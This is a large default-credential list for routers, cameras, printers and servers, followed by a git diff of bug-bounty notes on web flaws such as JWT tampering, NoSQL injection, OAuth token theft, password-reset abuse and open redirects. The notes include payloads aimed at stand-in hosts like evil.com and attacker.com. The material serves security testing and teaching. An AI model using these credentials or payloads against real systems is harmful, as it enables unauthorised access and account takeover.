-UNIX,Generic,,Multi,lpadm,lpadm,User, -UNIX,Generic,,Multi,lynx,lynx,User, -UNIX,Generic,,Multi,mail,,User, -UNIX,Generic,,Multi,man,man,User, -UNIX,Generic,,Multi,me,,User, -UNIX,Generic,,Multi,mountfs,mountfs,Admin, -UNIX,Generic,,Multi,mountsys,mountsys,Admin, -UNIX,Generic,,Multi,news,,User, -UNIX,Generic,,Multi,nobody,nobody,User, -UNIX,Generic,,Multi,operator,operator,User, -UNIX,Generic,,Multi,oracle,,User, -UNIX,Generic,,Multi,postmaster,,User, -UNIX,Generic,,Multi,rje,rje,User, -UNIX,Generic,,Multi,root,root,Admin, -UNIX,Generic,,Multi,shutdown,,User, -UNIX,Generic,,Multi,sync,,User, -UNIX,Generic,,Multi,sys,system,Admin, -UNIX,Generic,,Multi,sysadm,sysadm,Admin, -UNIX,Generic,,Multi,sysadmin,sysadmin,Admin, -UNIX,Generic,,Multi,system_admin,,Admin, -UNIX,Generic,,Multi,trouble,trouble,User, -UNIX,Generic,,Multi,umountfsys,umountfsys,User, -UNIX,Generic,,Multi,unix,unix,User, -UNIX,Generic,,Multi,uucp,uucp,User, -UNIX,Generic,,Multi,web,,User, -UNIX,Generic,,Multi,webmaster,webmaster,User, -UNIX,Generic,,Multi,www,,User, 
-UNIX,Generic,,Telnet,service,smile,,Motorola Default -UNIX,Generic,,Telnet,setup,,,Motorola Default -UNIX,koppp,,Telnet,dream,trocse,Admin, -US ROBOTICS,ADSL Ethernet Modem,,HTTP,,12345,Admin, -US Robotics,SureConnect ADSL,SureConnect ADSL,Telnet,support,support,User,works after 3rd login trial -US Robotics,USR5462,,HTTP,,admin,Admin, -US Robotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always user root -US Robotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem -US Robotics,USR9106,,HTTP,admin,admin,Admin, -US Robotics,USR9110,,HTTP,admin,,Admin,default IP subnet: 192.168.1.0 -USR,TOTALswitch,Any,,,amber,, -UTStarcom,B-NAS/B-RAS,1000,,dbase,dbase,, -UTStarcom,B-NAS/B-RAS,1000,,guru,*3noguru,, -Ubiquiti,IP Camera system,,HTTP,ubnt,ubnt,, -Unex,NexIP Routers,,,,password,, -Unisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin, -Unisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration, -Unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged, -Unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility -Unknown,POCSAG Radio Paging,2.05,Port 8000,,password,Admin, -Unknown,System 88,,Console,overseer,overseer,Admin, -VASCO,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server -VMware Inc.,RabbitMQ,,HTTP,guest,guest,Administrator,https://www.rabbitmq.com/access-control.html#default-state -VPASP,VP-ASP Shopping Cart,,HTTP,admin,admin,Admin, -Various,DD-WRT,v23 SP1 Final,HTTP,root,admin,Admin,Alternative firmware -Verifone,Verifone Junior,2.05,,,166816,, -Verilink,NE6100-4 NetEngine,IAD 3.4.8,Telnet,,,Guest, -Verint,IP Camera system,,HTTP,admin,admin,, -Vertex,VERTEX 1501,5.05,,root,vertex25,Administrator, -VideoIQ,IP Camera system,,HTTP,supervisor,supervisor,, -Visual Networks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin, -Vivotek,IP Camera system,,HTTP,root,,, -Vobis,PC BIOS,,Console,,merlin,, -VxWorks,misc,,Multi,admin,admin,Admin, -VxWorks,misc,,Multi,guest,guest,Guest, -W-Box,IP Camera 
system,,HTTP,admin,wbox / 123,, -WLAN_3D,Router,,HTTP,Administrator,admin,Admin, -WWWBoard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin, -Wanadoo,Livebox,,Multi,admin,admin,Admin, -Wang,Wang,,Multi,CSG,SESAME,Admin, -WashTec,SoftCare Evo,Type SE10,,,00000,unlimited access,https://www.washtec.com.au/files/tech-data/SoftCare2%20EVO%20Manual.pdf -WashTec,SoftCare Evo,Type SE10,,,00001,limited access,https://www.washtec.com.au/files/tech-data/SoftCare2%20EVO%20Manual.pdf -Watch guard,firebox 1000,,Multi,admin,,Admin, -Watchguard,Firebox,,,(blank),wg,admin, -Watchguard,Firebox,3-4.6,Console,,wg (touch password),Admin, -Watchguard,SOHO and SOHO6,Any,FTP,user,pass,Admin, -Watchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN -WebRamp,410i,,,wradmin,tracell,Admin, -WebTrends,Enterprise Reporting,,HTTP,Admin,,Admin, -Webmin,Webmin,Any *nix,HTTP,admin,,Admin, -Weidmüeller,IE-SW16-M,,,admin,detmond,admin, -Westell,Ultraline Series3 A90-,1.02.00.04,,admin,password1,Admin,Verizon cable router (Model -Westell,Ultraline Series3 A90-9100EM15-10,1.02.00.04,,admin,password1,Admin,Verizon cable router (Model 9100EM on front) -Westell,Versalink 327,,Multi,admin,,Admin, -Westell,Wang,,Multi,CSG,SESAME,Admin, -Westell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin, -Westell,Wirespeed,,Multi,admin,password,Admin,also try password: sysAdmin -Win2000,Quick Time 4.0,Englisch,,,,, -Wodsee,IP Camera system,,HTTP,root,,, -WorldClient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient, -Wyse,Winterm 3150,,VNC,,password,Admin,by satadru -Wyse,Winterm,5440XL,Console,root,wyse,Admin, -Wyse,Winterm,5440XL,VNC,VNC,winterm,VNC, -Wyse,Winterm,9455XL,BIOS,,Fireport,BIOS, -Wyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive -Wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server, -Wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to, -Wyse,winterm,,Multi,root,,Admin, -X-Micro,WLAN 11b Access 
Point,1/2/2002,Multi,super,super,Admin,http://secunia.com/advisories/11342/ -X-Micro,WLAN 11b Access Point,37258,Multi,super,super,Admin,http://secunia.com/advisories/ -X-Micro,X-Micro WLAN 11b Broadband Router,1.2.2/1.2.2.3/1.2.2.4/1.6.0.0,Multi,super,super,Admin,From BUGTRAQ -X-Micro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ -XAMPP,XAMPP Filezilla FTP Server,,,newuser,wampp,User, -Xavi,7000-ABA-ST1,,Console,,,Admin, -Xavi,7001,,Console,,,Admin, -Xerox,240a,,HTTP,admin,x-admin,Admin, -Xerox,6204,,Multi,,0,Admin, -Xerox,DocuCentre 425,,HTTP,admin,22222,Admin,works for access panel 2 -Xerox,Document Centre 405,,HTTP,admin,admin,Admin, -Xerox,Document Centre 425,,HTTP,admin,,Admin, -Xerox,DocumentCenter 186,2007,,admin,x-admin,admin, -Xerox,Multi Function Equipment,,Multi,admin,2222,Admin, -Xerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access -Xerox,WorkCenter Pro 428,,HTTP,admin,admin,Admin, -Xerox,WorkCentre 7132,,Multi,11111,x-admin,Admin, -Xerox,Workcentre,,,admin,1111,, -Xylan,OmniStack 1032CF,3.2.8,,admin,password,Admin, -Xylan,Omniswitch,,Telnet,admin,switch,Admin, -Xylan,Omniswitch,,Telnet,diag,switch,Admin, -Xylan,Omniswitch,,Telnet,diag,switch,User, -Xylan,Omniswitch,3.1.8,,admin,switch,, -Xylan,omniswitch,,Multi,admin,switch,Admin, -Xyplex,MX-16XX,,,setpriv,system,Admin, -Xyplex,Routers,,Port 7000,,access,User, -Xyplex,Routers,,Port 7000,,system,Admin, -Xyplex,Terminal Server,,Port 7000,,access,User, -Xyplex,Terminal Server,,Port 7000,,system,Admin, -Yakumo,Routers,,HTTP,admin,admin,Admin, -ZEOS,PC BIOS,,Console,,zeosx,Admin, -ZOOM,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin, -ZTE,F609,ANY,HTTP,admin,Telkomdso123,admin, -ZTE,F660,ANY,HTTP,admin,Web@0063,admin,192.168.1.1 -ZTE,F660,ANY,HTTP,user,user,admin,192.168.1.1 -ZTE,F663,ANY,HTTP,user,user,admin,Interface UC/UPC -ZTE,F670L,ANY,HTTP,user,user,admin,192.168.1.1 -ZTE,ZXDSL 831,4.2,Multi,ADSL,expert03,Admin,Default 
Password if user does not change it -Zabbix LLC,Zabbix,ANY,HTTP,Admin,zabbix,Administrator,https://www.zabbix.com/documentation/current/manual/quickstart/login -Zcom,,XG1021 N,HTTP,admin,password,,https://www.192-168-1-1-ip.co/router/zcom/XG1021%20N/19187/ -Zcom,Wireless,,SNMP,root,admin,Admin, -Zebra,10/100 Print Server,,Multi,admin,1234,Admin, -Zenith,PC BIOS,,Console,,3098z,Admin, -Zeus,Zeus Admin Server,4.1r2,HTTP,admin,,, -Zorin Group,Zorin OS,,,root,mecktech,Admin,If it doesn’t work try `MeckTech` or `mechtech` -ZyXEL ZyWALL Series,Prestige 660R-61C,,Multi,,admin,Admin, -ZyXEL,641 ADSL,,,,1234,Admin, -ZyXEL,Generic Routers,,Telnet,,1234,Admin, -ZyXEL,Prestige 100IH,,Console,,1234,Admin, -ZyXEL,Prestige 128 Modem-Router,,,,1234,Admin, -ZyXEL,Prestige 643,,Console,,1234,Admin, -ZyXEL,Prestige 645,,HTTP,admin,1234,Admin, -ZyXEL,Prestige 650,,Multi,1234,1234,Admin, -ZyXEL,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1 -ZyXEL,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080 -ZyXEL,Prestige,,FTP,root,1234,Admin, -ZyXEL,Prestige,,HTTP,,1234,Admin,http://192.168.1.1 -ZyXEL,Prestige,,Telnet,,1234,Admin, -ZyXeL,660HW,,HTTP,admin,,Admin,terra -ZyXel Based (Generic),Broadband SOHO Router,925ahcd on circuit board print,,admin,0,Admin,Password is 4 zeros. Gray router with pink bezel. 
-ZyXel,Prestige P660HW,,Multi,admin,1234,Admin, -Zyxel,ES-2108,,Multi,admin,1234,Admin, -Zyxel,G570S,v2,,,1234,Admin, -Zyxel,Generic Routers,,Telnet,,1234,Administrator, -Zyxel,ISDN-Router Prestige 1000,,,,1234,, -Zyxel,NWA1100,,,,1234,Admin, -Zyxel,Presige,660HW,HTTP/FTP/Telnet,,1234,,Default IP 192.168.1.1 -Zyxel,Presige,P-2302R,HTTP,admin,1234,Administrator, -Zyxel,Prestige 650HW31,31,Telnet,192.168.1.1 60020,@dsl_xilno,Admin, -Zyxel,Prestige 652HW-31,HTTP,admin,1234,Administrator,, -Zyxel,Prestige 660HW,,Multi,admin,admin,Admin, -Zyxel,Prestige,652HW-31,HTTP,admin,1234,Administrator, -Zyxel,Router,650-1,Telnet,,1234,Admin,Telefonica -Zyxel,ZyWall 2,,HTTP,,,Admin, -Zyxel,adsl routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no -accton t-online,accton,,Multi,,0,Admin, -adtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT -adtran,Atlas 800/800Plus/810Plus/,,Telnet,,Password,Admin,crtl-L -adtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L -adtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times -adtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times -adtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times -adtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times -adtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times -adtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times -adtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times -adtran,TSU Router Module/,,Telnet,,,Admin,hit enter a few times -adtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times -alcatel,,,,,,, -alcatel,speed touch home,,,,,, -apc,Smartups 3000,,HTTP,apc,apc,Admin, -apc,Smartups 3000,,HTTP,apc,apc,Admin,By Sentinel Software.net -apple,airport5,1.0.09,Multi,root,admin,Admin,192.168.1.1 -asmack,router,ar804u,HTTP,admin,epicrouter,Admin, -asus,WL500g,,HTTP,admin,admin,Admin, -axis,2100,,Multi,,,Admin, -aztech,DSL-600E,,HTTP,admin,admin,Admin, -bay,cv1001003,,,,,, 
-canyon,router,,Multi,Administrator,admin,Admin, -cisco,2600 router,,Telnet,cisco,,Admin, -cisco,2600,,Telnet,Administrator,admin,Admin, -cisco,3600,,Telnet,Administrator,admin,Guest, -cisco,ESW-520-24-K9,2.0,,cisco,cisco,admin, -cisco,GSR,,Telnet,admin,admin,admin, -cisco,WRVS4400N,1.0,,admin,admin,admin, -cisco,cva 122,,Telnet,admin,admin,Admin, -comtrend,ct536+,,Multi,admin,,Admin, -conexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin, -conexant,ACCESS RUNNER ADSL,,Telnet,Administrator,admin,Admin, -corecess,3113,,Multi,admin,,Admin, -creative,2015U,,Multi,,,Admin, -cuproplus,bus,,Multi,,,Admin, -cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin, -d-link,ads500g,,HTTP,admin,admin,Admin, -d-link,di-524,,HTTP,admin,,Admin, -decnet,decnet,,Multi,operator,admin,Guest, -dell,inspiron,,Multi,,admin,Admin, -digicom,Wavegate 54C,,HTTP,Admin,,Admin, -dlink,adsl,,HTTP,admin,admin,Admin, -draytek,Vigor3300 series,,Telnet,draytek,1234,Admin, -edimax,wireless adsl router,AR-7024,Multi,admin,epicrouter,Admin, -emai,hotmail,,,,,, -enCAD,XPO,,Multi,,,Admin, -ericsson,ericsson acc,,Multi,,,Admin, -ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default, -fon,La fonera,0.7.1 r1,HTTP,admin,admin,Admin,fon.com -fore,,,,,,, -fujitsu,l460,,,,,, -gatway,solo9100,win95,,,,, -giga,8ippro1000,,Multi,Administrator,admin,Admin, -glFtpD,glFtpD,all,Console,glftpd,glftpd,Admin, -greatspeed,DSL,,HTTP,netadmin,nimdaten,Admin,ETB Colombia -hp,2300,,Multi,admin,admin,Admin, -hp,sa7200,,Multi,admin,,Admin, -hp,sa7200,,Multi,admin,admin,Admin, -huawei incorporate,k3765,9.4.3.16284,,admin,admin,, -iBall,iB-LR6111A,,HTTP,admin,admin,, -iBall,iB-WRB150N,,HTTP,admin,admin,, -iDirect,iNFINITY series,3000/5000/7000,Telnet,admin,P@55w0rd!,Admin,to enable ssh connections to the router: service sshd start -iDirect,iNFINITY series,3000/5000/7000,ssh,root,iDirect,Admin,first enable sshd telnet to router: service sshd 
start -iPSTAR,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system. -iPSTAR,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers -iblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line -ibm,a20m,,Multi,,admin,Admin, -ihoi,oihoh,lknlkn,HTTP,Administrator,pilou,Admin, -inchon,inchon,inchon,Multi,admin,admin,Admin,inchon -infacta,group mail,,Multi,Administrator,,Admin, -intel,netstructure,480t,Telnet,admin,,Admin, -intex,organizer,,Multi,,,Admin, -ion,nelu,nel,Multi,,admin,Admin,vreau ceva -ion,nelu,nel,Multi,Administrator,admin,Admin,vreau ceva -kaptest,usmle,,HTTP,admin,,Admin, -latis network,border guard,,Multi,,,Admin, -linksys,BEFW11S4,2,Multi,,admin,Admin,Comes up as BEFW11S4 V.2 when you try and log into it. -linksys,ap 1120,,Multi,,,Admin, -linksys,wag354g,,Telnet,admin,admin,User, -linksys,wrt54g,,Multi,admin,admin,Admin, -longshine,isscfg,,HTTP,admin,0,Admin, -lucent,Portmaster 3,unknown,,!root,!ishtar,, -lucent,dsl,,,,,, -lxy_nrg,87418,87418,Multi,,,Admin, -m0n0wall,m0n0wall,1.3,,admin,mono,Administrator,Firewall -maxdata,7000x,,Multi,,,Admin, -maxdata,ms2137,,Multi,,,Admin, -mediatrix 2102,mediatrix 2102,,HTTP,admin,1234,Admin, -medion,Routers,,HTTP,,medion,Admin, -microRouter,900i,,Console/Multi,,letmein,Admin, -microcom,hdms,unknown,,system,hdms,, -motorola,sgb900,,HTTP,admin,motorola,Admin, -motorola,vanguard,,Multi,,,Admin, -mro software,maximo,v4.1,Multi,SYSADM,sysadm,Admin, -msdloto,msdloto,,,,,, -netgear,,,,,,, -netgear,DG834GT,192.168.0.1,Multi,admin,Password,Admin, -netgear,FM114P,,Multi,,,Admin, -netgear,dg834,,Multi,,admin,Admin, -netgear,sc101,,management software,admin,password,Admin, -netgear,sc101,,management,admin,password,Admin, -netlink,rt314,,,,,, -netscreen,firewall,,HTTP,Administrator,,Admin, -netscreen,firewall,,Telnet,Administrator,,Admin, 
-netscreen,firewall,,Telnet,admin,,Admin, -netscreen,firewall,,Telnet,operator,,Admin, -nortel,dms,,Multi,,,Admin, -nortel,p8600,,Multi,,,Admin, -novell,,,,,,, -olitec (Trendchip),sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23 -olitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250 -openELEC,openelec,8.0.4, SSH, root, openelec, sudo access, -openHAB,openHABian,2.5.10,Linux User (SSH & Samba),openhabian,openhabian,user, -openHAB,openHABian,2.5.10,openHAB Remote Console,openhab,habopen,user, -ovislink,WL-1120AP,,Multi,root,,Admin, -panasonic,cf 27,4,Multi,,,Admin, -penril datability,vcp300 terminal server,,Multi,,system,Admin, -pfSense,pfSense Firewall,1.0.1,Multi,admin,pfsense,Admin,http://www.pfsense.com -phpTest,phpTest,0.5.6,HTTP,admin,1234,Admin, -planet,Akcess Point,,HTTP,admin,admin,Admin, -planet,akcess point,,HTTP,admin,admin,Admin, -ptcl,zxdsl831cii,,,admin,admin,, -realtek,8139,,,,,, -sagem,fast 1400w,,Multi,root,1234,Admin, -samsung,modem/router,aht-e300,Multi,admin,password,Admin,after reset -samsung,n620,,Multi,,,Admin, -schoolgirl,member,,,ich,hci,, -security.org,lockpicking,,Multi,admin,,Admin, -seninleyimben,@skan,el rattani,FTP,admin,admin,Admin,11182360608 -sharp,AR-407/S402,,Multi,,,Admin, -siemen,speedstream 5400,059-e440-a02,HTTP,admin,,Admin, -siemens,hipath,,Multi,,,Admin, -silex technology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP -sitara,qosworks,,Console,root,,Admin, -smc,smc 7904BRA,,Multi,,smcadmin,Admin, -soho,nbg800,unknown,,admin,1234,, -stratacom,all,all,Multi,stratacom,stratauser,Admin, -surecom,ep3501/3506,own os,,admin,surecom,, -telecom,home hauwei,,Multi,operator,,Admin, -telindus,telindus,2002,Telnet,admin,admin,Admin, -thomson,speedtouch 585 v7,2+,,admin,password,administrator,uw club supply u wid dese boxes -topsec,firewall,,Multi,superman,talent,Admin, -toshiba,480cdt,,,,,, -us robotic,adsl gateway wireless router,,wireless 
router,support,support,super user access,I find it on a manual -us21100060,hp omibook 6100,,Multi,,,Admin, -voy,,,,,,, -webmail,webmail v0.94,,Multi,kol,gniffe,Admin, -westell,2200,,Multi,admin,password,Admin, -winwork,iso sistemi,,Multi,operator,,Admin, -wline,w3000g,,HTTP,admin,1234,Admin, -xd,xdd,xddd,Multi,xd,xd,Admin, -xerox,work centre pro 35,,HTTP,admin,1111,Admin, -xerox,xerox,,Multi,,admin,Admin, -xerox,xerox,,Multi,admin,admin,Admin, -xyplex,switch,3.2,Console,,,Admin, -zyxel,g-570s,,Multi,,admin,Admin, -zyxel,prestige 300 series,zynos 2.*,,,1234,, diff --git a/Misc/Email Spoofing.md b/Misc/Email Spoofing.md index 604fee8..1c5f39b 100644 --- a/Misc/Email Spoofing.md +++ b/Misc/Email Spoofing.md @@ -1,8 +1,9 @@ # Email Spoofing + ## Introduction Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value. -## How to Find +## How to detect 1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing ``` v=spf1 include:_spf.google.com ~all diff --git a/Misc/Exposed API keys.md b/Misc/Exposed API keys.md index 2558fee..c70a2ab 100644 --- a/Misc/Exposed API keys.md +++ b/Misc/Exposed API keys.md 
@@ -1,10 +1,15 @@ -# Exposed API Keys +# Exposed API Keys / Token OAuth + +## Introduction +Sometimes in a web application, an attacker can find some exposed API keys / token which can lead to financial loss to a company. + +## How to find +1. Find API keys / token by looking at the JavaScript code on the website +2. Find API keys / token by checking the request / response header ## Tools * [Key-Checker](https://github.com/daffainfo/Key-Checker) -## Definition -Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company. - -## How to exploit -[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys \ No newline at end of file +# References +* [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys +* [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API Key / Oauth tokens. The repository contain description API key, HTTP request, the response if the API key is valid / no, regex, and the example \ No newline at end of file diff --git a/Misc/JWT Vulnerabilities.md b/Misc/JWT Vulnerabilities.md index 58ffdb1..88776d1 100644 --- a/Misc/JWT Vulnerabilities.md +++ b/Misc/JWT Vulnerabilities.md @@ -1,8 +1,9 @@ # JWT Vulnerabilities + ## Introduction JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. -## How to Exploit +## How to exploit 1. Modify the algorithm to "none" algorithm ``` { 
@@ -18,5 +19,8 @@ If you change the algorithm from RS256 to HS256, the backend code uses the publi the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code. -Reference: +## Tools +* [jwt-hack](https://github.com/hahwul/jwt-hack) + +## Reference - [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) \ No newline at end of file diff --git a/Misc/Mass Assignment.md b/Misc/Mass Assignment.md index 44f5211..5522e46 100644 --- a/Misc/Mass Assignment.md +++ b/Misc/Mass Assignment.md @@ -1,8 +1,9 @@ # Mass Assignment Attack + ## Introduction Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS -## How to Exploit +## How to exploit - Normal request ``` POST /editdata @@ -30,4 +31,7 @@ HTTP/1.1 200 OK ... username=daffa&admin=true -``` \ No newline at end of file +``` + +## References +* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda) \ No newline at end of file diff --git a/Misc/Password Reset Flaws.md b/Misc/Password Reset Flaws.md index 4cbdd16..32dfb66 100644 --- a/Misc/Password Reset Flaws.md +++ b/Misc/Password Reset Flaws.md @@ -1,5 +1,9 @@ ## Password Reset Flaws +## Introduction +Common security flaws in password reset functionality + +## How to exploit 1. Parameter pollution in reset password ``` POST /reset @@ -77,7 +81,7 @@ email=victim@mail.com%0a%0dcc:hacker@mail.com ``` POST /newaccount [...] -{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”} +{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"} ``` 9. Find out how the tokens generate 
@@ -85,4 +89,7 @@ POST /newaccount - Generated based on the ID of the user - Generated based on the email of the user - Generated based on the name of the user -> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359) \ No newline at end of file + +## References +* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) +* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414) \ No newline at end of file diff --git a/Misc/Tabnabbing.md b/Misc/Tabnabbing.md index a139c6b..bc46528 100644 --- a/Misc/Tabnabbing.md +++ b/Misc/Tabnabbing.md @@ -1,8 +1,9 @@ # Tabnabbing + ## Introduction When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property. -## How to Find +## How to find ```html @@ -20,4 +21,7 @@ When you open a link in a new tab ( target="_blank" ), the page that opens in a ``` 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. -3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. \ No newline at end of file +3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. + +## References +* [Hackerone #260278](https://hackerone.com/reports/260278) \ No newline at end of file diff --git a/NoSQL Injection.md b/NoSQL Injection.md index 6054e7f..5e5563d 100644 --- a/NoSQL Injection.md +++ b/NoSQL Injection.md 
@@ -1,11 +1,9 @@ ## NoSQL injection -## Tools - -* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) - -## Exploit +## Introduction +NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. +## How to Exploit ### Authentication Bypass Basic authentication bypass using not equal ($ne) or greater ($gt) @@ -137,7 +135,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi [$ne]=1 ``` -## References +## Tools +* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) +## References * [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection) * [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md) \ No newline at end of file diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md index 00be06f..8655650 100644 --- a/OAuth Misconfiguration.md +++ b/OAuth Misconfiguration.md 
@@ -1,16 +1,22 @@ # OAuth Misconfiguration -1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses). -2. Change Referral header to attacker(.)com while requesting OAuth. -3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials. + +## Introduction +The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. + +## How to find +1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). +2. Change Referral header to attacker.com while requesting OAuth. +3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. 4. OAuth Token Re-use. 5. Missing or broken state parameter. 6. Lack of origin check. 7. Open Redirection on another endpoint > Use it in redirect_uri 8. If there is an email parameter after signin then try to change the email parameter to victim's one. 9. Try to remove email from the scope and add victim's email manually. -10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com -11. Check if its leaking client_secret parameter. -12. Go to the browser history and check if the token is there. +10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com +11. Check if its leaking client_secret parameter. +12. Go to the browser history and check if the token is there. 
-Reference: -- https://twitter.com/tuhin1729_/status/1417843523177484292 +## References +* [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292) +* [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e) \ No newline at end of file diff --git a/Open Redirect.md b/Open Redirect.md index 3e1fb93..621fce3 100644 --- a/Open Redirect.md +++ b/Open Redirect.md @@ -1,5 +1,9 @@ ## Open Redirect +## Introduction +Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain + +## How to Find 1. Try change the domain ``` /?redir=evil.com @@ -87,4 +91,8 @@ http://ⓔⓥⓘⓛ.ⓒⓞⓜ 17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a` ``` /?redir=/%0d/evil.com -``` \ No newline at end of file +``` + +## References +* [Hackerone #1250758](https://hackerone.com/reports/1250758) +* [@ahmadbrainworks](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5) \ No newline at end of file diff --git a/README.md b/README.md index ba18c73..9e724a0 100644 --- a/README.md +++ b/README.md @@ -7,6 +7,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty) ## List +- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) 
